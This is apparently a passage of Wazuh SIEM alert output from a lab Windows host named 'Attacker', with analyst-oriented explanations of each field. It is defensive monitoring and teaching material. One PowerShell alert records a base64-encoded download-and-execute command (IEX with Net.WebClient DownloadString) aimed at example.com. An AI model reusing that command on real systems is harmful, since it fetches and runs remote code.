data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:32.1436825Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284661
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:32.118 ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ProcessId: 16300 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1 CreationUtcTime: 2025-04-24 22:38:32.118 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:32.118
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:32.118
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:38:35.328+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:35.328+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534315.1650297
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26158
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit File Share' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"File Share"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:37.380+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:37.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  73
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534317.1653536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:34.7701903Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284685
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:33.507 ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ProcessId: 7408 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ParentProcessId: 16300 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:33.507
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:37.425+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:37.425+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  77
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534317.1661603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:35.0202773Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284690
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:34.972 ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ProcessId: 7408 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_duu0a5qz.2gs.ps1 CreationUtcTime: 2025-04-24 22:38:34.972 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:34.972
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duu0a5qz.2gs.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:34.972
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:39.337+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:39.337+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534319.1664368
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:36.4053980Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43871
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

